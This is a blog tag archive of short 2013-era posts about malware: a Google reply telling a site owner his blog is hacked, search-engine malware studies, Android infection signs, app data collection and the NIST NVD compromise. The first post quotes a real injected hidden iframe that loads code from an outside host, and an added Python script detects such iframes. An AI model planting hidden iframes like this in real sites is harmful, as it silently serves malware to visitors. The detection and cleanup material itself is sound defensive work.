Posts tagged Malware
Malware warning
May 3rd
Recently someone on Twitter complained that Chrome was labeling their site as malware:
http://Dvorak.org site blocked by Chrome browser after I wrote negative commentary about Google.
I took a few minutes to compose a reply, so I’ll go ahead and post it here:
Just to summarize: Chrome’s warning is correct. Your blog is hacked and injecting a malicious iframe on dvorak.org/blog/ even on error pages.
At the top of the page, the malicious iframe looks like this:
<style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style> <div class="rrfhezo"><iframe src="hxxp://cnsycrdv.organiccrap.com/jquery/get.php?ver=jquery.latest.js" width="420" height="475"></iframe>
I would recommend taking your blog down until you can fix the hack and remove the malware. If you verify dvorak.org at http://google.com/webmasters/ then we’ll show you the details we know about the malicious code.
We’re just the messenger here–this definitely had nothing to do with anything you wrote about Google. In fact, we recently published a website to help site owners recover from a hacked site: http://www.google.com/webmasters/hacked/
Getting hacked truly sucks though. I hope you’re able to get things cleaned up and in good shape. When you think the site is clean, you can file an appeal at http://google.com/webmasters for your hacked site and we’ll rescan it for malware. When it’s clean, we’ll remove the warning in Chrome.
Hope that helps,
Matt Cutts
I hope no one reading this ever gets hacked, but the truth is that some people will. You can reduce the odds of getting hacked by keeping all of your web server software up to date. If you do get hacked, our site at http://www.google.com/webmasters/hacked/ will walk you through the process of cleaning up your site. I know that some site owners are annoyed when Google flags their site as hacked or serving malware, but we’re trying to protect our users as best we can.
View full post on Matt Cutts: Gadgets, Google, and SEO
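A site owner can check their own pages for the pattern quoted in the reply above: an iframe from another host, inside an element that CSS pushes far off-screen. The following is an added example, not code from the original post or from Google; the function names, the 100px threshold and the exact-match host comparison are assumptions, and the sample page is constructed around the quoted snippet.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

OFFSCREEN_PX = 100  # assumed threshold: pushed at least this far off the page
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}

def is_offscreen(css):
    # True if a declaration block positions its element far off-screen.
    pairs = (d.partition(":") for d in css.split(";"))
    decls = {k.strip().lower(): v.strip().lower() for k, _, v in pairs if v}
    if decls.get("position") not in ("absolute", "fixed"):
        return False
    for prop in ("left", "top"):
        m = re.fullmatch(r"(-\d+(?:\.\d+)?)px", decls.get(prop, ""))
        if m and float(m.group(1)) <= -OFFSCREEN_PX:
            return True
    return False

class HiddenFrameFinder(HTMLParser):
    def __init__(self, offscreen_classes, site_host):
        super().__init__()
        self.offscreen, self.site_host = offscreen_classes, site_host
        self.stack = []      # (tag, hidden) for every open element
        self.findings = []   # (iframe host, line number)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = (bool(set((a.get("class") or "").split()) & self.offscreen)
                  or is_offscreen(a.get("style") or "")
                  or any(h for _, h in self.stack))
        if tag == "iframe" and hidden:
            host = urlparse(a.get("src") or "").hostname
            if host and host != self.site_host:
                self.findings.append((host, self.getpos()[0]))
        if tag not in VOID:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag, tolerating unclosed children.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

def find_hidden_external_iframes(html, site_host):
    css = " ".join(re.findall(r"<style[^>]*>(.*?)</style>", html, re.S | re.I))
    rules = re.findall(r"\.([\w-]+)\s*\{([^}]*)\}", css)
    finder = HiddenFrameFinder({n for n, body in rules if is_offscreen(body)}, site_host)
    finder.feed(html)
    return finder.findings

# Constructed page: the quoted snippet (URL kept defanged) plus two benign iframes.
SAMPLE = """<style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style>
<div class="rrfhezo"><iframe src="hxxp://cnsycrdv.organiccrap.com/jquery/get.php?ver=jquery.latest.js" width="420" height="475"></iframe></div>
<div class="video"><iframe src="https://player.example.org/embed/1" width="560" height="315"></iframe></div>
<iframe src="/local/widget.html" style="position:absolute;left:-9999px"></iframe>"""
print(find_hidden_external_iframes(SAMPLE, "dvorak.org"))
```

Only the off-screen third-party frame is reported; the visible embed and the hidden same-site frame are not. Run it against the HTML your server actually returns, including error pages, since the injection described above appeared there too.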
Bing Webmaster Tools Adds Malware Re-Evaluation & Geo-Targeting Tools
Apr 29th
Bing announced two new features for Bing Webmaster Tools. First, you can now see more details on malware issues impacting your site and be able to submit a malware re-evaluation request. Second, you can now geo-target specific pages, directories or your whole site within Bing Webmaster Tools. Bing…
Please visit Search Engine Land for the full article.
View full post on Search Engine Land: News & Info About SEO, PPC, SEM, Search Engines & Search Marketing
5 Signs Your Android Smartphone Is Infected With Malware
Apr 23rd

Guest author Catalin Cosoi is chief security strategist at Bitdefender.
Android malware seems to be spreading at a dizzying pace. In the second half of 2012 alone, Bitdefender found that Android malware spiked 292% from the first half of the year. This could pose a threat to millions of smartphone users worldwide.
Android malware is becoming harder to detect for the average smartphone user who pays little, if any, attention to security. Fortunately, most malware creators are not rocket scientists, and a user does not have to be a computer scientist to combat them.
Adding the following clues together could reveal the presence of malware:
1. Bad Battery Life
Android users who don’t perform a lot of battery-straining activities have a good idea of how long their battery should last. Malware gives itself away when batteries mysteriously drain quicker than usual. That’s usually due to adware, spam-like malware that shows app users an inordinate amount of ads. Continuously displaying aggressive adware will impact heavily on battery life.
Whether the malware is hiding in plain sight by pretending to be a regular application or trying to stay hidden from the user, abnormal battery drainage can often give away the presence of an Android infection.
2. Dropped Calls And Disruptions
Mobile malware can affect ongoing or incoming calls. Dropped calls or strange disruptions during a conversation could indicate the existence of mobile malware that is interfering. If you can’t blame your mobile carrier, then some strand of mobile malware could be the culprit. Call your service provider to determine if the dropped calls are its fault. If it is not your carrier, it is possible that someone or something is trying to eavesdrop on conversations or perform other suspicious activities.
3. Inordinately Large Phone Bills
Android malware often infects devices and starts sending SMS (text) messages to premium-rated numbers. While these effects are easily seen in your phone bill, not all malware programs are obviously greedy. They may send an SMS message just once a month to avoid suspicion, or they may uninstall themselves after punching a serious hole in your budget. Whether you use a monthly plan or a pay-as-you-go subscription, checking your bill should make it easy to figure out whether such message-sending malware has found its way onto a device.
4. Data Plan Spikes
Malware that smuggles data from your device to a third-party can often be detected by an examination of your data plan bill. Significant changes in your download or upload patterns could be a sign that someone or something has control over your device. Setting up data meter quotas might help figure out if a device has been compromised by data broadcasting malware. It will also help dodge high phone bills.
5. Clogged Performance
Depending on device hardware specifications, malware infestation may cause serious performance problems as it tries to read, write or broadcast data from your smartphone. Anybody that has ever had a PC infected with malware should be familiar with this. Imagine rebooting a device several times a day because background-running malware consumes too much processing power to let apps work properly. Performance clogging is yet another sign that malware might be present on your device. Checking RAM (Random Access Memory) use or CPU load could reveal the presence of malware that’s actively running on the device.
Stay Safe And Be Mindful
The Android versions most targeted by malware are the common ones – Gingerbread 2.3, Ice Cream Sandwich 4.0 and Jelly Bean 4.1. Android users with these builds have an 88% chance of having their mobile phone infected with malware according to the Android Developer Dashboard.
In the event that you do find yourself with malware on your Android, there are a couple of options. First, delete the offending app. Even if the app is deleted, malware may still linger. You may have to completely reset your smartphone by going into the settings menu and performing a “factory reset,” which will clear the memory of the device.
A variety of paid and free security apps are available in the Google Play Android app store to help prevent apps from doing bad things. If you use your Android smartphone for business, your IT department likely has security solutions to help you purge any malware.
In general, it is wise to scrutinize each and every permission an Android app asks for – many apps ask for invasive permissions when they don’t need them. Even apps packed with aggressive adware have a knack for collecting more data than they would ordinarily need to perform adequately. Be sure to read your permissions before clicking “accept.”
View full post on ReadWrite
Bing: Our Search Results Do Not Infect Users, “Malware Study Was Wrong”
Apr 19th
Bing has responded to the malware study conducted by AV-TEST earlier this week, claiming that Bing search results led to five times more malware than Google. To that Bing said, “the conclusions many have drawn from the study are wrong.” Why is the study wrong according to Bing? While…
View full post on Search Engine Land: News & Info About SEO, PPC, SEM, Search Engines & Search Marketing
Weekly Rundown: Google & Spam, Search Malware, GM Back to Facebook & More
Apr 14th
Google’s Matt Cutts and former ex-Googlers talk spam, rankings, and SEO tips. Google has safer results than Bing, Yandex, and Blekko. GM likes Facebook ads again. Here’s a quick recap of search and social marketing news and tips from the past week.
View full post on Search Engine Watch – Latest
Yandex Takes Exception To Search Malware Study
Apr 12th
Yandex has taken exception to a recent study that reported it has more malware in its search results than other major search engines like Google and Bing. The company shared its concerns with Search Engine Land via email, saying that it also sent the same response to AV-TEST, the German IT security…
View full post on Search Engine Land: News & Info About SEO, PPC, SEM, Search Engines & Search Marketing
Google Beats Bing, Yandex & Blekko At Keeping Malware Out Of Search Results [Study]
Apr 11th
About three years ago, Google was labeled in one study as the “King of Malware.” Things have apparently changed a lot since then. A new study reports that Google is beating its primary search competitors pretty significantly when it comes to keeping malware out of search results. The…
View full post on Search Engine Land: News & Info About SEO, PPC, SEM, Search Engines & Search Marketing
Many Free Android Apps Are Starting To Look A Lot Like Malware
Apr 5th
The money-go-round between app developers and ad networks is starting to blur the line between many free Android apps and malware. While these legitimate apps aren’t stealing passwords, they’re still riding roughshod over user privacy by gratuitously sucking up your contact and location information — or worse.
What These Bad Apps Glom Onto
Between last September and March, security vendor Bitdefender analyzed 130,000 popular Android apps on Google Play and found that roughly 13% collected your phone number without explicit notification, 12% stored your location data and 8% sucked up your email address. Included in those numbers are apps that siphoned off one or more of the three.
Many apps don’t stop there. Other data they glom onto includes your browsing activity, your contact list, the unique identification number of your device and even your call registry.
These apps took all that information legally. Android apps display their privacy policies in seeking permission to gather personal data, and many developers bank on the fact that most people will just click through to the app.
(See also: Hey! iOS Apps Play Faster And Looser With Your Data Than Android)
All that data gathering typically starts when an app developer downloads an ad framework provided by one of the more than 400 companies listed on the Ad Network Directory. Such frameworks make it easy for developers to display ads in the app, and thus to get paid every time someone clicks on them.
Since free apps only make money for developers from such clicks (and, it turns out, the distribution of associated user data), very few pay attention to exactly what kind of information ad frameworks are gathering.
“Because they copy-paste the code, they don’t really debug it; they don’t really look through it and see what data it collects,” Bitdefender researcher Liviu Arsene told me. “I bet they don’t even care.”
And It Doesn’t Stop There
App privacy policies often stake out even more aggressive data-collection goals, presumably to pave the way for future updates to vacuum up more info and further erode user privacy.
Take, for instance, Airpush, the second-largest ad network for Android developers with 40,000 apps. Its privacy policy reads, in part:
[I]n accordance with the permissions you have granted, we may collect your device ID, device make and model, device IP address, mobile web browser type and version, mobile carrier, real-time location information, email address, phone number and a list of the mobile applications on your device.
The policy goes on to explain that Airpush might supply that information to third-party advertisers who are part of its ad platform and third-party vendors, consultants and other service providers. Because the data is available to so many organizations, it’s virtually impossible to know who is using your personal data, and how, once it leaves the device.
Obviously, the possibilities for abuse here are legion. Suppose one of those third-party organizations is acquired by an outfit that is, shall we say, less reputable. Or that a third party company’s computers are hacked, spilling your data into the hands of cybercriminals.
The Feds Agree: It’s A Huge Problem
Federal regulators acknowledge that a huge problem exists. “Mobile technology provides unique privacy challenges,” Jon Leibowitz, departing chairman of the Federal Trade Commission, said in February, as reported by The Wall Street Journal. “Some would say it’s a sort of Wild West.”
The FTC wants the mobile industry to bolster privacy controls by allowing phone users to opt out of being tracked by ad networks. The commission also wants apps to prominently display the kind of data they’re collecting, rather than burying it in fine print. Congress is also considering proposals to tighten privacy protections on mobile devices, though it’s hard to say how such measures will fare given firm opposition from industry.
In the meantime, here’s some free (!!) advice: Scrutinize your free mobile apps as if they’re malware ready to wreak havoc on your personal information.
View full post on ReadWrite
Oh, The Irony: National Vulnerability Database Taken Down By Malware
Mar 14th
As if we needed more evidence that the hackers are winning, here is this: the National Vulnerability Database hosted by the National Institute of Standards and Technology has been stricken with malware and taken offline.
The NVD is a comprehensive database that integrates all of the United States government’s publicly available vulnerability resources. It is a resource to many security firms and security officers at enterprises for tracking day-to-day exploits that malicious hackers could use to breach secure systems.
In an email to security researcher Kim Halavakoski of Finland, NIST said that it had found multiple instances of malware on its public facing NVD websites and took the appropriate action to take the websites offline.
“The National Vulnerability Database public-facing Web site and several other NIST-hosted Web sites are currently unavailable due to discovery of malware on two NIST Web servers,” wrote Gail Porter from the NIST Public Inquiries Office, according to a Google+ post by Halavakoski as reported by The Register.
Visits to the NVD website confirm that it is indeed unavailable as of 9:00 a.m. EST, March 14.
The email from Porter to Halavakoski states that NIST’s firewall detected suspicious activity on Friday, March 8 and took steps to block the traffic from reaching the Internet. The malware on the NIST servers was traced to a software vulnerability. NIST said that there was no evidence its websites or the NVD contained or delivered any malware to users.
“NIST continually works to maintain the integrity of its IT infrastructure and acts to limit the impact of malware on its systems. We regret the impact this has had on our services,” Porter wrote.
Nowadays, everything is a target. That goes for the public facing websites and servers of prominent government agencies such as the NIST and CIA. When it comes to the backbone of government systems (non-public facing servers), those are much harder to crack. That is why we see more distributed denial of service (DDoS) attacks on prominent websites than actual breaches. Much of this DDoS activity came from groups like Anonymous and LulzSec, but the global black hat hacker community has been stepping up its efforts in past years to actually breach internal servers. We have seen this through more advanced spear phishing techniques and the alleged hacker wing of the People’s Liberation Army of China.
The NIST NVD site makes for an easy target. It is relied upon by many different groups and has a necessary public-facing website that is, by basic Internet Protocol, vulnerable. NIST played the breach by the book and took the site down.
View full post on ReadWrite
Where Has All The Mobile Malware Gone?
Feb 14th
Remember when everyone used to run Windows? Hardly a week went by when a friend or colleague lobotomized their machine with a virus. Some of this may have been a matter of Microsoft’s architecture, but much of it came down to Windows being a massive, juicy target. Given how much of our computing has moved to mobile, why aren’t we seeing mobile malware overwhelm us?
Mobile malware is out there, after all. Security software vendor ESET predicts “exponential growth of mobile malware” in 2013, coming on the heels of a 17X boom in mobile malware in 2012. Security company F-Secure finds that 79% of this new malware is focused squarely on the market leader, Android.
So why haven’t you been hacked?
After all, Android now commands over 50% of the global smartphone market, and took a whopping 69.7% of the market in Q4 2012, according to Gartner. Apple dominated the smartphone market for years with nary a scent of malware, perhaps due to its end-to-end control of its devices. Android is apparently getting slammed, according to the security firms, but I’ve yet to meet anyone that has experienced mobile malware, and I bet you haven’t, either. Why?
Hacks Vs. Mischief
It’s also possible that you have been attacked, but didn’t recognize it. According to BlueCoat Systems, “Mobile threats are still largely mischiefware – they have not yet broken the device’s security model but are instead more focused on for-pay texting scams or stealing personal information.” This jibes with ESET’s finding that of the types of malware being created, the most common today are SMS Trojans (40%), followed by malware apps that turn the devices they infect into zombies (32%), and malicious apps that pilfer information from one’s phone (28%).
Heavy-duty exploits are still uncommon, but that may change. For desktop exploits, malicious hackers can purchase ready-made exploit kits. These are far less common in the mobile world. Instead hackers increasingly are turning to the web to create device-agnostic attacks, infecting a web server and then directing users via phishing emails to click through to the infected site. When the user visits the site, malware is downloaded to her device. Given that so many companies use third parties to develop and host their mobile applications (e.g., usablenet for some hotel properties), users are not as suspicious as they should be of “mislabeled” sites.
Still, this likely hasn’t happened to you. Why?
Location, Location, Location
Geography. If you’re living in North America or Western Europe, you apparently aren’t the target. Yet. According to ESET, China, Russia and Iran have the highest incidence of malware by far. Another hot spot, according to Trend Micro, is Asia-Pacific, where it found a 417% increase in mobile malware apps (25,000) between Q1 and Q2 2012.
While mobile security firm BitDefender expects attacks against devices in North America and Europe to increase in 2013, the people infected are largely those visiting the seedier side of the Web, be it porn sites or unofficial app marketplaces.
Given how pervasive mobile computing has become, it’s inevitable that hackers will find more sophisticated ways to break through existing security mechanisms. Android isn’t the new Windows. Not yet.
View full post on ReadWrite


